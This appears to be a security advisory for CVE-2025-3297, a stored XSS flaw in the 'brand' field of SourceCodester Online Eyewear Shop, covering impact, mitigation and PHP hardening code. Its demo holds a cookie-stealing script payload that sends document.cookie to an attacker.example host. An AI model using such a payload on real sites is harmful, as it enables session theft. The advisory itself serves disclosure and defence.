A cross-site scripting (XSS) vulnerability, classified as problematic, has been identified in SourceCodester Online Eyewear Shop version 1.0. It allows an attacker to inject script into the application, potentially compromising user sessions and data. The flaw is in /classes/Master.php?f=save_product, which does not safely handle the 'brand' parameter. A patch is available in version 1.0.1.
Successful exploitation of CVE-2025-3297 lets an attacker place arbitrary JavaScript in the Online Eyewear Shop application through the 'brand' value submitted to save_product. Because that action saves product data, an injected value is likely persisted and then executed in the browser of every user who later views the affected product, so the exposure is not limited to the attacker's own session. Possible outcomes include session hijacking (where the session cookie is readable from script), defacement of the site, redirection of users to phishing pages, and theft of data entered into the application, such as login credentials or payment details. The attack can be launched over the network, which widens the exposed attack surface. Note that product-management actions in applications of this kind are usually restricted to staff or administrator accounts, so the realistic attacker is a user holding such an account or someone who has obtained one.
This vulnerability has been publicly disclosed, which increases the risk of exploitation: the vulnerable endpoint and parameter are known, and an XSS of this kind takes little skill to exploit. The CVSS rating is LOW, but the ease of exploitation and the potential impact on every user who views the affected content still warrant prompt attention. No active campaigns targeting this specific vulnerability had been reported as of the publication date, and it is not listed in the CISA KEV catalog.
Exploit status: EPSS 0.21% (43rd percentile).
The primary mitigation for CVE-2025-3297 is to upgrade to version 1.0.1 of the Online Eyewear Shop. If upgrading immediately is not feasible, fix the handling of the 'brand' parameter in /classes/Master.php?f=save_product: validate the value on input (reject markup rather than trying to strip it) and, more importantly, HTML-encode it at every point where it is rendered, because output encoding is the control that actually prevents script execution. Apply the same two checks to the other product fields handled by save_product, since the same pattern is likely to recur. A web application firewall tuned for XSS payloads can add a temporary layer of protection, but WAF signatures are routinely bypassed and should not be the only control.
Update to a patched version of the software, or contact the vendor for a corrected release. Until the fix is applied, validate and encode user input on this and any other parameter that is stored or reflected and later displayed, to prevent further XSS vulnerabilities.
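As an added illustration of the mitigation above (example code written for this page, not taken from the Online Eyewear Shop source), the following PHP contrasts an unsafe render of the stored 'brand' value with input validation in a hypothetical save_product handler and output encoding where the value is displayed. The function names, the products table and its brand column, and the sample payload are assumptions.

```php
<?php
// Added example for this page, not the Online Eyewear Shop's own code.
// Function names, the `products` table and its `brand` column are assumptions.
declare(strict_types=1);

// Unsafe pattern: the stored 'brand' value is echoed straight into HTML, so any
// markup an attacker saved through save_product runs in the viewer's browser.
function render_brand_unsafe(string $brand): string
{
    return "<td>{$brand}</td>";
}

// Hardened step 1 (input side, for the save_product handler): allow-list the
// characters a brand name may contain and reject everything else. Rejecting is
// preferable to stripping: the request fails visibly and can be logged.
function validate_brand(string $brand): string
{
    $brand = trim($brand);
    if ($brand === '' || mb_strlen($brand, 'UTF-8') > 100) {
        throw new InvalidArgumentException('brand must be 1 to 100 characters');
    }
    // Letters, digits, space, period, ampersand, apostrophe and hyphen only.
    if (!preg_match('/^[\p{L}\p{N} .&\'\-]+$/u', $brand)) {
        throw new InvalidArgumentException('brand contains characters that are not allowed');
    }
    return $brand;
}

// Hardened step 2 (output side): encode at the point of rendering. This is the
// control that actually stops XSS; the validation above is defence in depth.
// ENT_QUOTES covers attribute contexts; ENT_SUBSTITUTE keeps invalid UTF-8 from
// blanking the whole string.
function render_brand_safe(string $brand): string
{
    return '<td>' . htmlspecialchars($brand, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8') . '</td>';
}

// Hypothetical save handler: the validated value goes into a prepared statement,
// so the same field cannot become SQL injection either.
function save_product(PDO $db, array $post): void
{
    $brand = validate_brand((string) ($post['brand'] ?? ''));
    $stmt = $db->prepare('INSERT INTO products (brand) VALUES (:brand)');
    $stmt->execute([':brand' => $brand]);
}

// Demo on a constructed payload of the kind an attacker would submit as 'brand'.
$payload = '<script>location="https://attacker.example/?c="+document.cookie</script>';

echo render_brand_unsafe($payload), PHP_EOL;  // script tag reaches the browser
echo render_brand_safe($payload), PHP_EOL;    // &lt;script&gt;... shown as text

$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, brand TEXT NOT NULL)');
try {
    save_product($db, ['brand' => $payload]);
} catch (InvalidArgumentException $e) {
    echo 'save_product rejected: ', $e->getMessage(), PHP_EOL;
}
save_product($db, ['brand' => "Ray-Ban's & Co."]);
echo 'stored: ', $db->query('SELECT brand FROM products')->fetchColumn(), PHP_EOL;
```

Run with `php example.php` (needs the mbstring and pdo_sqlite extensions). The allow-list is deliberately strict because a brand name has a narrow legitimate character set; for free-text fields where quotes and angle brackets are legitimate input, validation alone cannot help, and the output encoding in render_brand_safe is the part of the fix that must be present on every page that displays the value.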
CVE-2025-3297 is a cross-site scripting (XSS) vulnerability in SourceCodester Online Eyewear Shop version 1.0, reachable through the 'brand' parameter of /classes/Master.php?f=save_product, that allows attackers to inject malicious scripts.
You are affected if you are running SourceCodester Online Eyewear Shop version 1.0 and have not upgraded to version 1.0.1.
Upgrade to version 1.0.1. As a temporary measure, validate the 'brand' parameter on input and HTML-encode it wherever it is displayed.
While no active campaigns have been confirmed, the vulnerability has been publicly disclosed, increasing the risk of exploitation.
Refer to the SourceCodester website or the CVE record for CVE-2025-3297 for the official advisory.